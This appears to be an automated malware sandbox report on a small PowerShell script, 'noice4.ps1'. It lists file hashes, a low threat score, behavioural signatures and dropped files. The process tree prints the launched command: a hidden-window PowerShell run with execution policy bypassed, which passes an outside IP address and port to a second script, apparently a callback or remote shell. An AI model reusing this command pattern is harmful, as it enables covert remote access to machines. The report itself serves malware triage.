Overview

overview

1

Static

static

noice4.ps1

windows7-x64

1

noice4.ps1

windows10-2004-x64

1

Analysis

  • max time kernel
    129s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/01/2023, 17:45

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    noice4.ps1

  • Size

    94B

  • MD5

    51c4f114929cc36620c003400c527699

  • SHA1

    4596e158498d5c9ff4aa694885122a3867a4592f

  • SHA256

    90cb3c97c0d80649d704e7fb0f171f84cc876cc2016b5bbd8a232341ef59890c

  • SHA512

    24f329d481a939d143a9ad8a20c8d2e22b55e5cf0150d3e0600f813f5cacbf86022ef8e46f1e4c3deb6cf59f5f2e6c0081d2f2f3e14bfc5b03c09b92f3294869

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\noice4.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File .\noice2.ps1 139.162.195.82 8080
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1940

Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          cd488961db34aaa8ef3178208699448e

          SHA1

          a32ca7998015f97e09c1245bed2791e9c0ec81f9

          SHA256

          59804d7599fb39235424f498e5fa4cd2434b2a924f37d60f842ea4a536e390ad

          SHA512

          59ab7742cb29fa66c86b3ebe63605de647b4e1d874523eb95dac2d4c8db88c65afb906315fe43ebe69bbe2b9087cf4ffea977605aac7d2eb39fbf698ee0c005e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          a316ebd4efa11d6b6daf6af0cc1aebce

          SHA1

          ab338dd719969c70590dbc039b90e2758c741762

          SHA256

          f7308f111e3910da5c34c4d06d78d692f44419f848f5bf886fd466d5a96ad014

          SHA512

          67a9b94b704222a1bbe02fa8780c6b9bd364c8581b693ca28c6a444fde160df216304426bacf6b01909b80540cf0add79669b7a88ca260a6fbc93c4742f36c5a

          Download Submit

        • memory/1084-132-0x0000018FFFD60000-0x0000018FFFD82000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1084-134-0x00007FF817550000-0x00007FF818011000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1084-138-0x00007FF817550000-0x00007FF818011000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1940-135-0x00007FF817550000-0x00007FF818011000-memory.dmp

          Filesize

          10.8MB

          Download